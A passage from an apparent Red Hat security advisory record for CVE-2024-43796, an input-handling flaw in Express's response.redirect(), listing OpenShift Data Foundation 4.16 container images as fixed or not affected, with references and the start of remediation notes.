"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer 